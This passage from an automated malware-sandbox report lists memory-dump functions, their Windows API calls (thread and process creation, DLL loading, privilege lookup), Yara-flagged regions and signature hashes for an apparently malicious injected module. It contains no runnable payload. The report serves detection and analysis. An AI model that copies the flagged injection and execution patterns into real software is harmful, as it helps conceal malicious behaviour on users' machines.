                                                                  • Associated: 00000005.00000002.595609255.0000000004DCF000.00000040.00000001.sdmp Download File
                                                                  Similarity
                                                                  • API ID: InitializeThunk
                                                                  • String ID:
                                                                  • API String ID: 2994545307-0
                                                                  • Opcode ID: 3ee4a98e3c6b43593ad22f24c7644b2534ea1773fc8c2e03a4b7c20dad723cff
                                                                  • Instruction ID: 54cd9a9ea7c2df51dea37f35ca7b059596ed940667dc7052af520af675944a57
                                                                  • Opcode Fuzzy Hash: 3ee4a98e3c6b43593ad22f24c7644b2534ea1773fc8c2e03a4b7c20dad723cff
                                                                  • Instruction Fuzzy Hash: 9790026121181046F20065694D14B07001697E435BF61C115E4245564CC955D8A17561
                                                                  Uniqueness

                                                                  Uniqueness Score: -1.00%

                                                                  APIs
                                                                  • Sleep.KERNELBASE(000007D0), ref: 00AE6F98
                                                                  Strings
                                                                  Memory Dump Source
                                                                  • Source File: 00000005.00000002.593224155.0000000000AD0000.00000040.00000001.sdmp, Offset: 00AD0000, based on PE: false
                                                                  Yara matches
                                                                  Similarity
                                                                  • API ID: Sleep
                                                                  • String ID: net.dll$wininet.dll
                                                                  • API String ID: 3472027048-1269752229
                                                                  • Opcode ID: fefa4cc8326fb63a7a03734f83125d29ce5f5428e0e94ab65301bb53b4236633
                                                                  • Instruction ID: 74352b505076572f710fe29f4ab18fa9077dbe6ad07d7ac8df93965099eb6f5f
                                                                  • Opcode Fuzzy Hash: fefa4cc8326fb63a7a03734f83125d29ce5f5428e0e94ab65301bb53b4236633
                                                                  • Instruction Fuzzy Hash: 2B319EB1601744ABC711DFA9D8A1FABB7F8BB88700F10841DF61AAB241D730B945CBE0
                                                                  Uniqueness

                                                                  Uniqueness Score: -1.00%

                                                                  APIs
                                                                  • Sleep.KERNELBASE(000007D0), ref: 00AE6F98
                                                                  Strings
                                                                  Memory Dump Source
                                                                  • Source File: 00000005.00000002.593224155.0000000000AD0000.00000040.00000001.sdmp, Offset: 00AD0000, based on PE: false
                                                                  Yara matches
                                                                  Similarity
                                                                  • API ID: Sleep
                                                                  • String ID: net.dll$wininet.dll
                                                                  • API String ID: 3472027048-1269752229
                                                                  • Opcode ID: 3072def42d302c6d7781895683f27c18be3171abca25ed5047fd5a616c06d37d
                                                                  • Instruction ID: 1446bf1ed5893316511ad9c8aada9052437e8e3fe81c251778215db31bba64e9
                                                                  • Opcode Fuzzy Hash: 3072def42d302c6d7781895683f27c18be3171abca25ed5047fd5a616c06d37d
                                                                  • Instruction Fuzzy Hash: 8E2182B1601344ABC711DF55D8A1F6BB7F8AB88700F14842DF61AAB241D770B545CBE5
                                                                  Uniqueness

                                                                  Uniqueness Score: -1.00%

                                                                  APIs
                                                                  • RtlFreeHeap.NTDLL(00000060,00000000,.z`,007A002E,00000000,00000060,00000000,00000000,?,?,00700069,?,00AD3B93), ref: 00AE850D
                                                                  Strings
                                                                  Memory Dump Source
                                                                  • Source File: 00000005.00000002.593224155.0000000000AD0000.00000040.00000001.sdmp, Offset: 00AD0000, based on PE: false
                                                                  Yara matches
                                                                  Similarity
                                                                  • API ID: FreeHeap
                                                                  • String ID: .z`
                                                                  • API String ID: 3298025750-1441809116
                                                                  • Opcode ID: 845b008de81d33adb325fbc3a51f2473a2c37cacaaeb7ed5946df8069e68f0b3
                                                                  • Instruction ID: 59abe229352d14e7f652fd231df83d23de307741f01f951d557ad4a2dbd60cf7
                                                                  • Opcode Fuzzy Hash: 845b008de81d33adb325fbc3a51f2473a2c37cacaaeb7ed5946df8069e68f0b3
                                                                  • Instruction Fuzzy Hash: 2EE0A971204608ABDB14CF58CC88EA73769EF88320F104654F9089B782C631ED018AA0
                                                                  Uniqueness

                                                                  Uniqueness Score: -1.00%

                                                                  APIs
                                                                  • RtlFreeHeap.NTDLL(00000060,00000000,.z`,007A002E,00000000,00000060,00000000,00000000,?,?,00700069,?,00AD3B93), ref: 00AE850D
                                                                  Strings
                                                                  Memory Dump Source
                                                                  • Source File: 00000005.00000002.593224155.0000000000AD0000.00000040.00000001.sdmp, Offset: 00AD0000, based on PE: false
                                                                  Yara matches
                                                                  Similarity
                                                                  • API ID: FreeHeap
                                                                  • String ID: .z`
                                                                  • API String ID: 3298025750-1441809116
                                                                  • Opcode ID: 540c4433df045b48126259b9153db85e530e9dd1f040c1eb84158749b6bc4ef9
                                                                  • Instruction ID: 80ea9cb18d66f62e54a093252cd0cedda5750e71013ff08dfc1513a0b1c619d9
                                                                  • Opcode Fuzzy Hash: 540c4433df045b48126259b9153db85e530e9dd1f040c1eb84158749b6bc4ef9
                                                                  • Instruction Fuzzy Hash: CEE04FB12002086BD714DF59CC45EA777ACEF88750F014554FD0C57281C630F910CAF0
                                                                  Uniqueness

                                                                  Uniqueness Score: -1.00%

                                                                  APIs
                                                                  • PostThreadMessageW.USER32(0065002E,00000111,00000000,00000000,00000000), ref: 00AD72CA
                                                                  • PostThreadMessageW.USER32(0065002E,00008003,00000000,?,00000000), ref: 00AD72EB
                                                                  Memory Dump Source
                                                                  • Source File: 00000005.00000002.593224155.0000000000AD0000.00000040.00000001.sdmp, Offset: 00AD0000, based on PE: false
                                                                  Yara matches
                                                                  Similarity
                                                                  • API ID: MessagePostThread
                                                                  • String ID:
                                                                  • API String ID: 1836367815-0
                                                                  • Opcode ID: 49ab76c00c9184220b9dbad1f4bc5ba5386cd827cddda64d51339b7d16c96ff1
                                                                  • Instruction ID: 2378eaf985608fedeaf6ed6a805f7f2a28130752f28593ce020dadab4f28cd28
                                                                  • Opcode Fuzzy Hash: 49ab76c00c9184220b9dbad1f4bc5ba5386cd827cddda64d51339b7d16c96ff1
                                                                  • Instruction Fuzzy Hash: 8E01F731A8022877E720A6948D03FFF776C5B00B50F050019FF04BA2C1E6946A0542F5
                                                                  Uniqueness

                                                                  Uniqueness Score: -1.00%

                                                                  APIs
                                                                  • LdrLoadDll.NTDLL(00000000,00000000,00000003,?), ref: 00AD9BA2
                                                                  Memory Dump Source
                                                                  • Source File: 00000005.00000002.593224155.0000000000AD0000.00000040.00000001.sdmp, Offset: 00AD0000, based on PE: false
                                                                  Yara matches
                                                                  Similarity
                                                                  • API ID: Load
                                                                  • String ID:
                                                                  • API String ID: 2234796835-0
                                                                  • Opcode ID: 54eed7fb54c4bb33c5ecf3c62be074d2fec7e96364ab3bba8fcd8ce07f2b6dc1
                                                                  • Instruction ID: b94ba84de464f078a6672866615fba4ad8584c321572682897bc46943f97f117
                                                                  • Opcode Fuzzy Hash: 54eed7fb54c4bb33c5ecf3c62be074d2fec7e96364ab3bba8fcd8ce07f2b6dc1
                                                                  • Instruction Fuzzy Hash: CE0121B5E0020DABDF10EBE5ED42FDEB7799B54308F004195E9199B241F671EB18CB91
                                                                  Uniqueness

                                                                  Uniqueness Score: -1.00%

                                                                  APIs
                                                                  • CreateProcessInternalW.KERNELBASE(?,00000000,?,?,00000000,00000000,?,?,?,00000000,00000000,?,?,00000000,?,00000000), ref: 00AE85A4
                                                                  Memory Dump Source
                                                                  • Source File: 00000005.00000002.593224155.0000000000AD0000.00000040.00000001.sdmp, Offset: 00AD0000, based on PE: false
                                                                  Yara matches
                                                                  Similarity
                                                                  • API ID: CreateInternalProcess
                                                                  • String ID:
                                                                  • API String ID: 2186235152-0
                                                                  • Opcode ID: 91c10d5b09b6f5ff7ee6d1e22534128eefdcfa4a5b7191d55d386dbf4554461c
                                                                  • Instruction ID: 9914150585f78d7bd205916b197883750e0297c374d89eda310ca3d43ea3547e
                                                                  • Opcode Fuzzy Hash: 91c10d5b09b6f5ff7ee6d1e22534128eefdcfa4a5b7191d55d386dbf4554461c
                                                                  • Instruction Fuzzy Hash: 1401AFB2210108ABCB54DF89DC80EEB77ADAF8C754F158258BA0D97241C630E851CBA4
                                                                  Uniqueness

                                                                  Uniqueness Score: -1.00%

                                                                  APIs
                                                                  • CreateThread.KERNELBASE(00000000,00000000,-00000002,?,00000000,00000000,?,?,00ADCCE0,?,?), ref: 00AE705C
                                                                  Memory Dump Source
                                                                  • Source File: 00000005.00000002.593224155.0000000000AD0000.00000040.00000001.sdmp, Offset: 00AD0000, based on PE: false
                                                                  Yara matches
                                                                  Similarity
                                                                  • API ID: CreateThread
                                                                  • String ID:
                                                                  • API String ID: 2422867632-0
                                                                  • Opcode ID: 843a0880f06e9e863fee6976a31fdf7fa6d37b5fe3459a448924215b1f76f399
                                                                  • Instruction ID: b34c7b1c0dc303b78a11ae2e1b93cb51da0f4da89bcc2f08c8f56f6842b54266
                                                                  • Opcode Fuzzy Hash: 843a0880f06e9e863fee6976a31fdf7fa6d37b5fe3459a448924215b1f76f399
                                                                  • Instruction Fuzzy Hash: 22E06D333803043AE630659AAC02FA7B29C8B81B20F150026FB0DEB2C1D595F80142A4
                                                                  Uniqueness

                                                                  Uniqueness Score: -1.00%

                                                                  APIs
                                                                  • RtlAllocateHeap.NTDLL(00AE3526,?,00AE3C9F,00AE3C9F,?,00AE3526,?,?,?,?,?,00000000,00000000,?), ref: 00AE84CD
                                                                  Memory Dump Source
                                                                  • Source File: 00000005.00000002.593224155.0000000000AD0000.00000040.00000001.sdmp, Offset: 00AD0000, based on PE: false
                                                                  Yara matches
                                                                  Similarity
                                                                  • API ID: AllocateHeap
                                                                  • String ID:
                                                                  • API String ID: 1279760036-0
                                                                  • Opcode ID: 8e19f400c171d6a3a0c60781967f2ff4188041467ae78b5c4cbc47cbc38682a9
                                                                  • Instruction ID: a84217331e2b5134feac756d344599ba7d8e91bed1a9935c3b568c9857987b77
                                                                  • Opcode Fuzzy Hash: 8e19f400c171d6a3a0c60781967f2ff4188041467ae78b5c4cbc47cbc38682a9
                                                                  • Instruction Fuzzy Hash: 90F08CB22002186FE724EF94DC84EEB776DEF84350F148999F9485B281C931EA05C7E0
                                                                  Uniqueness

                                                                  Uniqueness Score: -1.00%

                                                                  APIs
                                                                  • RtlAllocateHeap.NTDLL(00AE3526,?,00AE3C9F,00AE3C9F,?,00AE3526,?,?,?,?,?,00000000,00000000,?), ref: 00AE84CD
                                                                  Memory Dump Source
                                                                  • Source File: 00000005.00000002.593224155.0000000000AD0000.00000040.00000001.sdmp, Offset: 00AD0000, based on PE: false
                                                                  Yara matches
                                                                  Similarity
                                                                  • API ID: AllocateHeap
                                                                  • String ID:
                                                                  • API String ID: 1279760036-0
                                                                  • Opcode ID: dbc85f5d6ec309ef36b9f2608a1eb2a4b62d8afe5e68cfcabc4c09da243958e1
                                                                  • Instruction ID: f1f15bb18c8fc20692dd784b2e6ae0b02208cd5b4b9e99b91053e747efee3c3a
                                                                  • Opcode Fuzzy Hash: dbc85f5d6ec309ef36b9f2608a1eb2a4b62d8afe5e68cfcabc4c09da243958e1
                                                                  • Instruction Fuzzy Hash: 3CF0E2322041407FE725DFA48DC2EE37B68DF94360F1449A9F94C9F146C93999028BA0
                                                                  Uniqueness

                                                                  Uniqueness Score: -1.00%

                                                                  APIs
                                                                  • RtlAllocateHeap.NTDLL(00AE3526,?,00AE3C9F,00AE3C9F,?,00AE3526,?,?,?,?,?,00000000,00000000,?), ref: 00AE84CD
                                                                  Memory Dump Source
                                                                  • Source File: 00000005.00000002.593224155.0000000000AD0000.00000040.00000001.sdmp, Offset: 00AD0000, based on PE: false
                                                                  Yara matches
                                                                  Similarity
                                                                  • API ID: AllocateHeap
                                                                  • String ID:
                                                                  • API String ID: 1279760036-0
                                                                  • Opcode ID: ecb7fbf7fbf697e7ed6b19bb654fc0845e00bd12648aab82589a03cf581b1705
                                                                  • Instruction ID: 7895fb6df723a7b8d9230ed32be969e619252e272345e5b8f0882ad93f6469a6
                                                                  • Opcode Fuzzy Hash: ecb7fbf7fbf697e7ed6b19bb654fc0845e00bd12648aab82589a03cf581b1705
                                                                  • Instruction Fuzzy Hash: FFE012B1200208ABDB14EF99CC81EA777ACAF88650F118558BA085B282CA30F9108AB0
                                                                  Uniqueness

                                                                  Uniqueness Score: -1.00%

                                                                  APIs
                                                                  • LookupPrivilegeValueW.ADVAPI32(00000000,?,00ADCFB2,00ADCFB2,?,00000000,?,?), ref: 00AE8670
                                                                  Memory Dump Source
                                                                  • Source File: 00000005.00000002.593224155.0000000000AD0000.00000040.00000001.sdmp, Offset: 00AD0000, based on PE: false
                                                                  Yara matches
                                                                  Similarity
                                                                  • API ID: LookupPrivilegeValue
                                                                  • String ID:
                                                                  • API String ID: 3899507212-0
                                                                  • Opcode ID: c524c4dcdeb286be68a002add1a356f71d86b8c938967e6280f3f61150ebef6a
                                                                  • Instruction ID: f1a30fd7f09a1f61d7062f684595104cca9aa94bdfa992f4ccafe265e99d4070
                                                                  • Opcode Fuzzy Hash: c524c4dcdeb286be68a002add1a356f71d86b8c938967e6280f3f61150ebef6a
                                                                  • Instruction Fuzzy Hash: DBE01AB12002086BDB10DF49CC85EE737ADAF88650F018554BA0C57281C934E8108BF5
                                                                  Uniqueness

                                                                  Uniqueness Score: -1.00%

                                                                  APIs
                                                                  • SetErrorMode.KERNELBASE(00008003,?,?,00AD7C73,?), ref: 00ADD44B
                                                                  Memory Dump Source
                                                                  • Source File: 00000005.00000002.593224155.0000000000AD0000.00000040.00000001.sdmp, Offset: 00AD0000, based on PE: false
                                                                  Yara matches
                                                                  Similarity
                                                                  • API ID: ErrorMode
                                                                  • String ID:
                                                                  • API String ID: 2340568224-0
                                                                  • Opcode ID: 49ec7ea19b45082ce71059444928ac468c46794dc6bfedb52c16374b2d1231c4
                                                                  • Instruction ID: 0fe70c7d4f60fab101c8b8ed752ac877ea5b864ace970f211fc69bf335bcad94
                                                                  • Opcode Fuzzy Hash: 49ec7ea19b45082ce71059444928ac468c46794dc6bfedb52c16374b2d1231c4
                                                                  • Instruction Fuzzy Hash: 69D0A7727503043BEA10FBA49C07F2672CC5B44B00F494074F949D73C3D964F9004161
                                                                  Uniqueness

                                                                  Uniqueness Score: -1.00%

                                                                  APIs
                                                                  Memory Dump Source
                                                                  • Source File: 00000005.00000002.595219970.0000000004CB0000.00000040.00000001.sdmp, Offset: 04CB0000, based on PE: true
                                                                  • Associated: 00000005.00000002.595539917.0000000004DCB000.00000040.00000001.sdmp Download File
                                                                  • Associated: 00000005.00000002.595609255.0000000004DCF000.00000040.00000001.sdmp Download File
                                                                  Similarity
                                                                  • API ID: InitializeThunk
                                                                  • String ID:
                                                                  • API String ID: 2994545307-0
                                                                  • Opcode ID: 4e3f4758f5008d6f9e8d07dacac2da59b51dadaefcc91eb4cbb9a1e964b2cd26
                                                                  • Instruction ID: 825b3e7bdb85d2d8341416f5764a0198fbf536146f38aebf06cf749052af146b
                                                                  • Opcode Fuzzy Hash: 4e3f4758f5008d6f9e8d07dacac2da59b51dadaefcc91eb4cbb9a1e964b2cd26
                                                                  • Instruction Fuzzy Hash: 7EB02BB19010C0C9F700D7600708717390077D0304F22C051D2020241A0338D0C0F1B1
                                                                  Uniqueness

                                                                  Uniqueness Score: -1.00%

                                                                  Non-executed Functions

                                                                  C-Code - Quality: 53%
                                                                  			E04D6FDDA(intOrPtr* __edx, intOrPtr _a4) {
                                                                  				void* _t7;
                                                                  				intOrPtr _t9;
                                                                  				intOrPtr _t10;
                                                                  				intOrPtr* _t12;
                                                                  				intOrPtr* _t13;
                                                                  				intOrPtr _t14;
                                                                  				intOrPtr* _t15;
                                                                  
                                                                  				_t13 = __edx;
                                                                  				_push(_a4);
                                                                  				_t14 =  *[fs:0x18];
                                                                  				_t15 = _t12;
                                                                  				_t7 = E04D1CE00( *__edx,  *((intOrPtr*)(__edx + 4)), 0xff676980, 0xffffffff);
                                                                  				_push(_t13);
                                                                  				E04D65720(0x65, 1, "RTL: Enter CriticalSection Timeout (%I64u secs) %d\n", _t7);
                                                                  				_t9 =  *_t15;
                                                                  				if(_t9 == 0xffffffff) {
                                                                  					_t10 = 0;
                                                                  				} else {
                                                                  					_t10 =  *((intOrPtr*)(_t9 + 0x14));
                                                                  				}
                                                                  				_push(_t10);
                                                                  				_push(_t15);
                                                                  				_push( *((intOrPtr*)(_t15 + 0xc)));
                                                                  				_push( *((intOrPtr*)(_t14 + 0x24)));
                                                                  				return E04D65720(0x65, 0, "RTL: Pid.Tid %p.%p, owner tid %p Critical Section %p - ContentionCount == %u\n",  *((intOrPtr*)(_t14 + 0x20)));
                                                                  			}










                                                                  0x04d6fdda
                                                                  0x04d6fde2
                                                                  0x04d6fde5
                                                                  0x04d6fdec
                                                                  0x04d6fdfa
                                                                  0x04d6fdff
                                                                  0x04d6fe0a
                                                                  0x04d6fe0f
                                                                  0x04d6fe17
                                                                  0x04d6fe1e
                                                                  0x04d6fe19
                                                                  0x04d6fe19
                                                                  0x04d6fe19
                                                                  0x04d6fe20
                                                                  0x04d6fe21
                                                                  0x04d6fe22
                                                                  0x04d6fe25
                                                                  0x04d6fe40

                                                                  APIs
                                                                  • __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 04D6FDFA
                                                                  Strings
                                                                  • RTL: Pid.Tid %p.%p, owner tid %p Critical Section %p - ContentionCount == %u, xrefs: 04D6FE2B
                                                                  • RTL: Enter CriticalSection Timeout (%I64u secs) %d, xrefs: 04D6FE01
                                                                  Memory Dump Source
                                                                  • Source File: 00000005.00000002.595219970.0000000004CB0000.00000040.00000001.sdmp, Offset: 04CB0000, based on PE: true
                                                                  • Associated: 00000005.00000002.595539917.0000000004DCB000.00000040.00000001.sdmp Download File
                                                                  • Associated: 00000005.00000002.595609255.0000000004DCF000.00000040.00000001.sdmp Download File
                                                                  Similarity
                                                                  • API ID: Unothrow_t@std@@@__ehfuncinfo$??2@
                                                                  • String ID: RTL: Enter CriticalSection Timeout (%I64u secs) %d$RTL: Pid.Tid %p.%p, owner tid %p Critical Section %p - ContentionCount == %u
                                                                  • API String ID: 885266447-3903918235
                                                                  • Opcode ID: a16b332a0fbf55dc833bdd9a39ba4ebbde1c0d9a155eea5214559718d0999b67
                                                                  • Instruction ID: 41f152680e397a9e272ef4fcd2e13a896c9f84b99f06224c56d2b4e0b7fcf9d8
                                                                  • Opcode Fuzzy Hash: a16b332a0fbf55dc833bdd9a39ba4ebbde1c0d9a155eea5214559718d0999b67
                                                                  • Instruction Fuzzy Hash: CAF0F632740601BFE6205A45EC02F23BF5AEB44730F140318F628565E1EA62F87096F4
                                                                  Uniqueness

                                                                  Uniqueness Score: -1.00%